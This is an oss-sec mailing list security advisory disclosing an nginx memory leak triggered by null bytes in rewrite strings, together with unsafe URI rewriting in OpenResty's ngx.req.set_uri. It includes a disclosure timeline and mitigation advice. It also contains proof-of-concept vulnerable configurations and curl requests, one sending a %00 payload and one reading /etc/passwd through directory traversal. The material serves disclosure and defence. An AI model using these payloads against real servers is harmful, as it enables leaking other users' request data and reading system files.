oss-sec mailing list archives

Insecure implementation of OpenResty ngx.req.set_uri + memory content leak in nginx.

From: Vladimir Dubrovin <vlad () securityvulns ru>
Date: Wed, 18 Mar 2020 16:10:32 +0300

OpenResty is LUA engine for nginx reverse proxy.

Affected versions: tested on nginx-1.17.5 and openresty- on
ubuntu 18.04

Two independent problems were identified in OpenResty and nginx,
potentially leading to different security vulnerabilities: Header
injection/CRLF injection, directory traversal/local file read,
restrictions bypass, memory content disclosure in some nginx + openresty

1. There is a bug in nginx "rewrite" implementation. It can disclose the
fragment of the process memory with 301/302 HTTP reply if rewrite string
contains ASCII 0 character. Within nginx itself rewrite string is a
static configuration option, and is not supposed to be manipulated

2. OpenResty implements ngx.req.set_uri() via raw rewrite in nginx
without any additional filtering or normalization. If used with
untrusted input it can lead to CRLF/header injection, directory
traversal/local file read, restrictions bypass. Due to (1) it can also
lead to memory content disclosure.


As of now, there is no fix for ngx.req.set_uri(), this function must be considered as potentially unsafe.


Avoid usage of ngx.req.set_uri() with untrusted input or implement strict input filtering.



21.03.2019 - Memory content leak reported to Mail.Ru team via H1 by @maxarr in https://hackerone.com/reports/513236
22.03.2019 - Memory content leak is mitigated on Mail.Ru side
05.11.2019 - Problem additionally researched by Denis 'KPEBETKA' Denisov and Nikolay Ermishkin of Mail.Ru Security 
Team, root cause tracked to nginx+openresty.
07.11.2019 - Reported to nginx team
08.11.2019 - Acknowledged by nginx team
13.12.2019 - nginx team reported back the issue is not tracked as a security bug in nginx, secure rewrite will not be 
provided by nginx API
16.12.2019 - memory leak bug fixed in nginx master branch
17.12.2019 - reported to OpenResty team
17.12.2019 - acknowledged by OpenResty team
18.03.2020 - disclosed



This configuration demonstrates memory content leak in nginx:

Vulnerable config (^@ is a null byte)

location ~ /memleak {
    rewrite ^.*$ "^@asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf";

location / {
    root html;
    index index.html index.htm;

curl localhost:8337/memleak -vv
Location: http://localhost:8337/WjWj

WjWj – is a random peace of memory, usual includes parts of other requests

vulnerable code:


last = ngx_http_map_uri_to_path(r, &path, &root, 0);

Doesn't handle location with null byte properly


last = ngx_cpystrn(last, r->uri.data + alias, r->uri.len - alias + 1);

Writes only null byte to last, not the whole r->uri.data


if (!clcf->alias && clcf->root_lengths == NULL && r->args.len == 0) {

It's important to get into this conditional branch to get memory leak


r->headers_out.location->value.len = len;

location length more than was really written, location ends with random
piece of memory (usually includes part of other HTTP requests).

Example of configuration vulnerable to  memory leak with

location ~ /memleak {
    rewrite_by_lua_block {
        local args, err = ngx.req.get_post_args();
        ngx.req.set_uri( args["url"], true );

location / {
    root html;
    index index.html index.htm;

curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
Location: http://localhost:8337/WjWj

Example of configuration vulnerable to directory traversal with

location ~ /rewrite {
    rewrite ^.*$ $arg_x;

location / {
    root html;
    index index.html index.htm;

curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd

-- Vladimir Dubrovin

Current thread: